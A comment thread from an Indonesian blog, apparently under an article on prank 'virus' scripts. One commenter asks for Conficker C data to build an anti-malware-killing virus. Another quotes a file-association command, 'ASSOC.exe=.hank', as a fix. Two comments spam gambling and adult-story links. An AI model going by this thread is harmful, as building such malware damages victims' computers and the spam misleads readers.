avatar
16 Agustus 2014 07.54

mohon gan kasih tau Data Conficker Paket C
udh buat virus Recylernya tinggal Conficker C nya doang
kasih tau datanya dong Pleasee
virusnya ampuh buat Nge Kill Anti Malware! loh
jadi tinggal nyari Data Confickernya doang

Reply
avatar
28 Agustus 2014 06.48

kalo cara bersihin virus yang formatnya .vbs gimana bang?

Reply
avatar
4 September 2014 08.45

Okeee... yang nulis artikel ini insya allah nambah terus pahalanya. goooooood aku suka sama artikel ini.

Reply
avatar
19 Oktober 2015 19.37

delete virusnya.... & problem sovled

Reply
avatar
19 Oktober 2015 19.37

delete virusnya.... & problem sovled

Reply
avatar
12 November 2015 21.42

alhamdulillah dapat solusinya bang yang cmd ASSOC.exe=.hank

Reply
avatar
22 Januari 2016 19.50

Artikel yang bagus gan :)
Terima kasih gan :)

Silakan Kunjungi blog ane ya gan ^_^

http://trikandroid89.blogspot.com

http://ceritasexx69.blogspot.com

http://lilamu.blogspot.com

http://bandarsbobetterpercaya.com

http://beritaunik69.blogspot.com

Agen Poker

Agen Domino

Agen Casino Terpercaya

Agen Bola Terpercaya

Berita Menarik

Cerita Dewasa Jilbab

Cerita Dewasa

Berita Unik

Agen PokerTerpercaya

Reply
avatar
22 Januari 2016 19.50

Artikel yang bagus gan :)
Terima kasih gan infonya :)

Silakan Kunjungi blog ane ya gan ^_^

http://beritaunik69.blogspot.com

http://trikandroid89.blogspot.com

http://bandarsbobetterpercaya.com

http://ceritasexx69.blogspot.com

http://lilamu.blogspot.com

http://taruhan138.com

http://agensbo138.com

Reply
avatar
24 Januari 2016 21.02

Hahaha....
seru juga ngejailin orang, tapi jangan berlebihan juga yah , kasian, :-D

Mapir juga yah kesini:
http://blog-agus-sukmajaya.blogspot.co.id/

Reply
avatar
12 Juli 2016 00.49

leptop sodara gw dvdNya buka terus -_- meski sudah di hapus. setelah di hapus gw scane pake antivirus. tetep terbuka. solusinya gimana?

Reply
avatar
27 Juli 2016 01.01

izin copy min .... hahaa
monggo mampir http://blogsepattmg3.blogspot.co.id/

Reply
avatar
31 Juli 2016 08.43

mengapa ya setiap mau tulis 1 huruf aja, malah nulis sendiri sampai tak terhingga.....

Reply
avatar
24 Agustus 2016 04.47

berguna tong ji ini virus, buat laptop saya menjadi error karna virus ini udah aku uji

Reply

Untuk menyisipkan kode pendek, gunakan <i rel="code"> ... KODE ... </i>
Untuk menyisipkan kode panjang, gunakan <i rel="pre"> ... KODE ... </i>
Untuk menyisipkan gambar, gunakan <i rel="image"> ... URL GAMBAR ... </i>